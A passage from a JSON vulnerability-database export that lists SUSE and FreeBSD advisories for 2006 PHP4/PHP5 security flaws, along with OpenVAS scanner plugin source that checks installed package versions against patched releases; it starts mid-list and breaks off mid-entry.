"php5-curl-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-wddx", "packageFilename": "php4-wddx-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-gd", "packageFilename": "php4-gd-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-wddx", "packageFilename": "php4-wddx-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-devel", "packageFilename": "php4-devel-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-session", "packageFilename": "php4-session-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4", "packageFilename": "php4-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "This update fixes the following security problems in the PHP scripting language:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2006-11-15T14:56:56", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "remote code execution in php4,php5", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465"], "modified": "2006-11-15T14:56:56", "id": "SUSE-SA:2006:067", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-11/msg00016.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:46", "references": ["http://www.php.net/release_5_1_5.php", "http://www.php.net/release_4_4_4.php"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-nms", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-horde", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-dtc", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-nms", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cli", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-dtc", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mod_php5", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mod_php4", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cgi", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-horde", "operator": "lt"}], "description": "\nThe PHP development team reports:\n\n\nAdded missing safe_mode/open_basedir checks inside the\n\t error_log(), file_exists(), imap_open() and imap_reopen()\n\t functions.\nFixed overflows inside str_repeat() and wordwrap()\n\t functions on 64bit systems.\nFixed possible open_basedir/safe_mode bypass in cURL\n\t extension and with realpath cache.\nFixed overflow in GD extension on invalid GIF\n\t images.\nFixed a buffer overflow inside sscanf() function.\nFixed an out of bounds read inside stripos()\n\t function.\nFixed memory_limit restriction on 64 bit system.\n\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2006-08-18T00:00:00", "title": "php -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-4483", "CVE-2006-4484", "CVE-2006-4485", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2014-03-28T00:00:00", "id": "EA09C5DF-4362-11DB-81E1-000E0C2E438A", "href": "https://vuxml.freebsd.org/freebsd/ea09c5df-4362-11db-81e1-000e0c2e438a.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:14", "references": [], "pluginID": "57375", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "FreeBSD Ports: php4, php5", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4486", "CVE-2006-4483", "CVE-2006-4484", "CVE-2006-4485", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2016-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57375", "id": "OPENVAS:57375", "sourceData": "#\n#VID ea09c5df-4362-11db-81e1-000e0c2e438a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n php4 php5 php4-cli php5-cli php4-cgi php5-cgi php4-dtc php5-dtc\n php4-horde php5-horde php4-nms php5-nms mod_php4 mod_php5\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.php.net/release_4_4_4.php\nhttp://www.php.net/release_5_1_5.php\nhttp://www.vuxml.org/freebsd/ea09c5df-4362-11db-81e1-000e0c2e438a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57375);\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-4481\", \"CVE-2006-4482\", \"CVE-2006-4483\", \"CVE-2006-4484\", \"CVE-2006-4485\", \"CVE-2006-4486\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: php4, php5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.4\")<0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"5\")>=0 && revcomp(a:bver, b:\"5.1.5\")<0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.4.4\")<0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"5\")>=0 && revcomp(a:bver, b:\"5.1.5\")<0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php4-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package php5-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mod_php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>=0) {\n txt += 'Package mod_php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:36:08", "references": [], "pluginID": "1361412562310110067", "description": "PHP 5.1.x < 5.1.5 suffers from multiple vulnerabilities such as a buffer overflow,\n user authentication bypass and Multiple heap-based buffer overflows.", "edition": 5, "reporter": "Copyright NopSec Inc. 2012", "published": "2012-06-21T00:00:00", "title": "PHP Version 5.1.x < 5.1.5 Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4483", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-1017", "CVE-2006-4485", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2018-07-09T00:00:00", "id": "OPENVAS:1361412562310110067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110067", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_1_5.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version 5.1.x < 5.1.5 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110067\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_cve_id(\"CVE-2006-1017\", \"CVE-2006-4020\", \"CVE-2006-4481\", \"CVE-2006-4482\",\n \"CVE-2006-4483\", \"CVE-2006-4484\", \"CVE-2006-4485\");\n script_bugtraq_id(16878, 19415, 19582);\n script_name(\"PHP Version 5.1.x < 5.1.5 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.1.5 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP 5.1.x < 5.1.5 suffers from multiple vulnerabilities such as a buffer overflow,\n user authentication bypass and Multiple heap-based buffer overflows.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"5.1\", test_version2:\"5.1.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.1.5\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "references": [], "pluginID": "57567", "description": "The remote host is missing an update to php4\nannounced via advisory DSA 1206-1.\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-3353\n\nTim Starling discovered that missing input sanitising in the EXIF\nmodule could lead to denial of service.\n\nCVE-2006-3017\n\nStefan Esser discovered a security-critical programming error in the\nhashtable implementation of the internal Zend engine.\n\nCVE-2006-4482\n\nIt was discovered that str_repeat() and wordwrap() functions perform\ninsufficient checks for buffer boundaries on 64 bit systems, which\nmight lead to the execution of arbitrary code.\n\nCVE-2006-5465\n\nStefan Esser discovered a buffer overflow in the htmlspecialchars()\nand htmlentities(), which might lead to the execution of arbitrary\ncode.", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 1206-1 (php4)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2006-3017", "CVE-2006-4482", "CVE-2006-5465"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57567", "id": "OPENVAS:57567", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1206_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1206-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-18. Builds for hppa and m68k will be provided later\nonce they are available.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4:4.4.4-4 of php4 and version 5.1.6-6 of php5.\n\nWe recommend that you upgrade your php4 packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201206-1\";\ntag_summary = \"The remote host is missing an update to php4\nannounced via advisory DSA 1206-1.\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-3353\n\nTim Starling discovered that missing input sanitising in the EXIF\nmodule could lead to denial of service.\n\nCVE-2006-3017\n\nStefan Esser discovered a security-critical programming error in the\nhashtable implementation of the internal Zend engine.\n\nCVE-2006-4482\n\nIt was discovered that str_repeat() and wordwrap() functions perform\ninsufficient checks for buffer boundaries on 64 bit systems, which\nmight lead to the execution of arbitrary code.\n\nCVE-2006-5465\n\nStefan Esser discovered a buffer overflow in the htmlspecialchars()\nand htmlentities(), which might lead to the execution of arbitrary\ncode.\";\n\n\nif(description)\n{\n script_id(57567);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2006-3017\", \"CVE-2006-4482\", \"CVE-2006-5465\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1206-1 (php4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.3.10-18\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", 